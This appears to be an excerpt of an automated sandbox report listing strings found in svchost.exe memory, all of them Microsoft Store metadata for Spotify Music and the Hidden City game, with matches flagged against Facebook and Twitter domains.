","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey 
","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
Source: svchost.exe, 00000007.00000003.752939030.0000028A6801D000.00000004.00000001.sdmp String found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey 
","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
Source: svchost.exe, 00000007.00000003.752939030.0000028A6801D000.00000004.00000001.sdmp String found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey 
","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
Source: svchost.exe, 00000007.00000002.771405969.0000028A67B15000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.facebook.com (Facebook)
Source: svchost.exe, 00000007.00000002.771405969.0000028A67B15000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.twitter.com (Twitter)
Source: svchost.exe, 00000007.00000003.759491776.0000028A67B6E000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD",
"MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2020-11-16T08:29:46.4904070Z||.||18ebec36-1675-40c0-a5d4-25e9e774360f||1152921505692410033||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 00000007.00000003.759491776.0000028A67B6E000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD",
"MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2020-11-16T08:29:46.4904070Z||.||18ebec36-1675-40c0-a5d4-25e9e774360f||1152921505692410033||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 00000007.00000003.761768611.0000028A67B5A000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE2 equals www.facebook.com (Facebook)
Source: svchost.exe, 00000007.00000003.761768611.0000028A67B5A000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE2 equals www.twitter.com (Twitter)
Source: svchost.exe, 00000007.00000003.752761271.0000028A67B67000.00000004.00000001.sdmp String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey 
","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
Source: svchost.exe, 00000007.00000003.752761271.0000028A67B67000.00000004.00000001.sdmp String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey 
","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
Source: svchost.exe, 00000007.00000003.752761271.0000028A67B67000.00000004.00000001.sdmp String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR